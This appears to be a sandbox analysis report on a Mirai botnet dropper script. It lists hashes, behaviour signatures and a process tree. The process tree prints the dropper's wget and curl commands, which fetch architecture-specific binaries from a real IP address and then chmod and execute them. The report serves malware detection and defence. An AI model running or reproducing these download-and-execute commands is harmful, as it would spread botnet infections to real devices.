Overview

overview

10

Static

static

1

6dd36ae06f...b1a.sh

ubuntu-18.04-amd64

10

6dd36ae06f...b1a.sh

debian-9-armhf

10

6dd36ae06f...b1a.sh

debian-9-mips

10

6dd36ae06f...b1a.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    139s
  • max time network
    152s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    08/03/2025, 08:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh

  • Size

    1KB

  • MD5

    c46ce91068e77aa58bd2127bec2ee6c3

  • SHA1

    fced6e9a98cb1fd8b568f7698dbf1b4e1e4231d5

  • SHA256

    6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a

  • SHA512

    ace2a1517ff4dceb812a495e8f5d5a4bbec6825964ffca84b076f57610ed09232b3ad76e995fd83ba121d4a36f82acb0136f27da8d4fc272bd083ac1d8e3e7e9

Score
10/10
miraibotnetbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (177422) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 1 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh
    /tmp/6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh
    1⤵
    • Executes dropped EXE
    • Modifies Watchdog functionality
    • Renames itself
    • Enumerates active TCP sockets
    • Changes its process name
    • Reads system network configuration
    • Reads runtime system information
    • Writes file to tmp directory
    PID:1488
    • /usr/bin/wget
      wget http://176.65.134.5/jklx86
      2⤵
      • Writes file to tmp directory
      PID:1492
    • /usr/bin/curl
      curl -O http://176.65.134.5/jklx86
      2⤵
      • Writes file to tmp directory
      PID:1500
    • /bin/cat
      cat jklx86
      2⤵
        PID:1509
      • /bin/chmod
        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
        2⤵
        • File and Directory Permissions Modification
        PID:1510
      • /usr/bin/wget
        wget http://176.65.134.5/jklmips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1513
      • /usr/bin/curl
        curl -O http://176.65.134.5/jklmips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1515
      • /bin/cat
        cat jklmips
        2⤵
        • System Network Configuration Discovery
        PID:1518
      • /bin/chmod
        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
        2⤵
        • File and Directory Permissions Modification
        PID:1519
      • /tmp/ssh
        ./ssh ssh
        2⤵
          PID:1520
        • /usr/bin/wget
          wget http://176.65.134.5/jklmpsl
          2⤵
            PID:1522
          • /usr/bin/curl
            curl -O http://176.65.134.5/jklmpsl
            2⤵
              PID:1523
            • /bin/cat
              cat jklmpsl
              2⤵
                PID:1524
              • /bin/chmod
                chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                2⤵
                • File and Directory Permissions Modification
                PID:1525
              • /tmp/ssh
                ./ssh ssh
                2⤵
                  PID:1526
                • /usr/bin/wget
                  wget http://176.65.134.5/jklarm4
                  2⤵
                    PID:1528
                  • /usr/bin/curl
                    curl -O http://176.65.134.5/jklarm4
                    2⤵
                      PID:1529
                    • /bin/cat
                      cat jklarm4
                      2⤵
                        PID:1530
                      • /bin/chmod
                        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                        2⤵
                        • File and Directory Permissions Modification
                        PID:1531
                      • /tmp/ssh
                        ./ssh ssh
                        2⤵
                          PID:1532
                        • /usr/bin/wget
                          wget http://176.65.134.5/jklarm5
                          2⤵
                            PID:1534
                          • /usr/bin/curl
                            curl -O http://176.65.134.5/jklarm5
                            2⤵
                              PID:1535
                            • /bin/cat
                              cat jklarm5
                              2⤵
                                PID:1536
                              • /bin/chmod
                                chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                2⤵
                                • File and Directory Permissions Modification
                                PID:1537
                              • /tmp/ssh
                                ./ssh ssh
                                2⤵
                                  PID:1538
                                • /usr/bin/wget
                                  wget http://176.65.134.5/jklarm6
                                  2⤵
                                    PID:1540
                                  • /usr/bin/curl
                                    curl -O http://176.65.134.5/jklarm6
                                    2⤵
                                      PID:1541
                                    • /bin/cat
                                      cat jklarm6
                                      2⤵
                                        PID:1542
                                      • /bin/chmod
                                        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:1543
                                      • /tmp/ssh
                                        ./ssh ssh
                                        2⤵
                                          PID:1544
                                        • /usr/bin/wget
                                          wget http://176.65.134.5/jklarm7
                                          2⤵
                                            PID:1546
                                          • /usr/bin/curl
                                            curl -O http://176.65.134.5/jklarm7
                                            2⤵
                                              PID:1547
                                            • /bin/cat
                                              cat jklarm7
                                              2⤵
                                                PID:1548
                                              • /bin/chmod
                                                chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                                2⤵
                                                • File and Directory Permissions Modification
                                                PID:1549
                                              • /tmp/ssh
                                                ./ssh ssh
                                                2⤵
                                                  PID:1550
                                                • /usr/bin/wget
                                                  wget http://176.65.134.5/jklppc
                                                  2⤵
                                                    PID:1552
                                                  • /usr/bin/curl
                                                    curl -O http://176.65.134.5/jklppc
                                                    2⤵
                                                      PID:1553
                                                    • /bin/cat
                                                      cat jklppc
                                                      2⤵
                                                        PID:1554
                                                      • /bin/chmod
                                                        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:1555
                                                      • /tmp/ssh
                                                        ./ssh ssh
                                                        2⤵
                                                          PID:1556
                                                        • /usr/bin/wget
                                                          wget http://176.65.134.5/jklm68k
                                                          2⤵
                                                            PID:1558
                                                          • /usr/bin/curl
                                                            curl -O http://176.65.134.5/jklm68k
                                                            2⤵
                                                              PID:1559
                                                            • /bin/cat
                                                              cat jklm68k
                                                              2⤵
                                                                PID:1560
                                                              • /bin/chmod
                                                                chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                                                2⤵
                                                                • File and Directory Permissions Modification
                                                                PID:1561
                                                              • /tmp/ssh
                                                                ./ssh ssh
                                                                2⤵
                                                                  PID:1562
                                                                • /usr/bin/wget
                                                                  wget http://176.65.134.5/jklsh4
                                                                  2⤵
                                                                    PID:1564
                                                                  • /usr/bin/curl
                                                                    curl -O http://176.65.134.5/jklsh4
                                                                    2⤵
                                                                      PID:1565
                                                                    • /bin/cat
                                                                      cat jklsh4
                                                                      2⤵
                                                                        PID:1566
                                                                      • /bin/chmod
                                                                        chmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh config-err-gACG2o jklmips jklx86 netplan_4tig9c16 snap-private-tmp ssh ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-fZYYj1
                                                                        2⤵
                                                                        • File and Directory Permissions Modification
                                                                        PID:1567
                                                                      • /tmp/ssh
                                                                        ./ssh ssh
                                                                        2⤵
                                                                          PID:1568

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • /tmp/jklmips
                                                                        Filesize

                                                                        74KB

                                                                        MD5

                                                                        531a60e53317c7bf134e5c6e57fc4939

                                                                        SHA1

                                                                        6069b3cb94084ec8bfad12f20a7fc992835e329d

                                                                        SHA256

                                                                        9c8fa144a9688475d367bf19f455fa2efcede7219a41cf77484cabe788e17fe9

                                                                        SHA512

                                                                        f19ca0527fb858aff4da9f864f1fad8433cc229b8ffabec4fd559a3af4a3fe3d71213a913067a6fea4314b75881ebbe5a8d24408cd8199a3ed54b15725c7505e

                                                                        Download Submit

                                                                      • /tmp/jklx86
                                                                        Filesize

                                                                        49KB

                                                                        MD5

                                                                        ecd1b914d0248a8174d1f5ef567e2227

                                                                        SHA1

                                                                        c5ba0731a7b3236db4b8443b6be4f2f07d5ed6e5

                                                                        SHA256

                                                                        adc70485dbae6ab79f9083ff5f96da2fece8b5922f0f5d0757d1c366285bfab6

                                                                        SHA512

                                                                        9e25c305fa81ce9c4f715d6bc746fae810bc255d7e3d10017242864c4c04923644e86fce42b16c0638a06eb44aa8abec2681d944670dd22d69ac4d0cebbe979f

                                                                        Download Submit